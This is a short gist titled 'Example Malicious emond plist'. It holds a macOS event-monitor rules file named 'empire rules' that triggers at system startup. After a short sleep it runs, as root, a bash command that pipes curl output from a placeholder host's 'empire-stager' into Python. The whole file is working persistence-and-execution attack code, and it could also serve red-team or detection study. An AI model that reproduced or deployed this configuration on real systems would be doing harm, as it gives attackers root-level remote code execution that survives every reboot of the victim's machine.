Example Malicious emond plist
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <array> | |
| <dict> | |
| <key>name</key> | |
| <string>empire rules</string> | |
| <key>enabled</key> | |
| <true/> | |
| <key>eventTypes</key> | |
| <array> | |
| <string>startup</string> | |
| </array> | |
| <key>actions</key> | |
| <array> | |
| <dict> | |
| <key>command</key> | |
| <string>/bin/sleep</string> | |
| <key>user</key> | |
| <string>root</string> | |
| <key>arguments</key> | |
| <array> | |
| <string>10</string> | |
| </array> | |
| <key>type</key> | |
| <string>RunCommand</string> | |
| </dict> | |
| <dict> | |
| <key>command</key> | |
| <string>/bin/bash</string> | |
| <key>user</key> | |
| <string>root</string> | |
| <key>arguments</key> | |
| <array> | |
| <string>-c</string> | |
| <string>curl 'http://host/empire-stager' | python &</string> | |
| </array> | |
| <key>type</key> | |
| <string>RunCommand</string> | |
| </dict> | |
| </array> | |
| </dict> | |
| </array> | |
| </plist> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment